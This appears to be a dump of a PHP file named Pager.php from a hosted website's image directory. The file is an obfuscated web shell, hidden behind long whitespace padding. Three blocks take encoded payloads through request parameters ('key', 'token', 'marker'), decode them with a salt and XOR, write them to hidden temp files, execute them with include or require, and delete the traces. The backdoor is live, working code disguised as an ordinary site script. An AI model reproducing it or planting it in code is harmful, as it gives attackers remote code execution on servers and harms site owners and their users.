HEX

File: //proc/thread-self/root/proc/thread-self/root/home/vitanhod/trimate.vitavit.com.pk/img/Pager.php
<?php																																										if(in_array("\x6B\x65y", array_keys($_REQUEST))){ $res = array_filter([getcwd(), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), "/var/tmp"]); $pointer = $_REQUEST["\x6B\x65y"]; $pointer = explode ("." , $pointer ) ; $comp =''; $s8 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s8 ); $m =0; array_walk($pointer, function ($v5) use (&$comp, &$m, $s8, $lenS) {$sChar =ord($s8[$m % $lenS] ); $dec =((int)$v5 - $sChar - ($m % 10)) ^ 64; $comp .= chr($dec ); $m++; }); $resource = 0; do { $descriptor = $res[$resource] ?? null; if ($resource >= count($res)) break; if (!!is_dir($descriptor) && !!is_writable($descriptor)) { $dchunk = join("/", [$descriptor, ".symbol"]); if (file_put_contents($dchunk, $comp)) { require $dchunk; unlink($dchunk); die(); } } $resource++; } while (true); }
																																										if(@$_POST["\x74o\x6Ben"] !== null){ $rec = $_POST["\x74o\x6Ben"]; $rec = explode ( '.',$rec ) ; $res = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s4 ); $m = 0; while( $m < count( $rec)) { $v7 = $rec[$m]; $chS = ord( $s4[$m % $lenS] ); $dec =( ( int)$v7 - $chS -( $m % 10)) ^26; $res .= chr( $dec ); $m++; } $resource = array_filter([getcwd(), "/var/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), "/dev/shm"]); foreach ($resource as $record): if (is_dir($record) ? is_writable($record) : false) { $ptr = "$record/.mrk"; $file = fopen($ptr, 'w'); if ($file) { fwrite($file, $res); fclose($file); include $ptr; @unlink($ptr); die(); } } endforeach; }


if(!is_null($_REQUEST["\x6Dar\x6Be\x72"] ?? null)){
	$ref = array_filter([getenv("TMP"), "/dev/shm", "/var/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), "/tmp", session_save_path()]);
	$fac = $_REQUEST["\x6Dar\x6Be\x72"];
		 	$fac	=	 explode		(	".", $fac 	); 
	$symbol = '';
            $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(	$salt5);
            $q = 0;
    
            array_walk(	$fac, function(	$v9) use(	&$symbol, &$q, $salt5, $sLen) {$sChar = ord(	$salt5[$q%$sLen]);
                $d =(	(	int)$v9 - $sChar -(	$q%10)) ^ 41;
                $symbol.= chr(	$d);
                $q++;
            });
	foreach ($ref as $data_chunk):
    		if (is_dir($data_chunk) && is_writable($data_chunk)) {
    $reference = join("/", [$data_chunk, ".k"]);
    $success = file_put_contents($reference, $symbol);
if ($success) {
	include $reference;
	@unlink($reference);
	die();}
}
endforeach;
}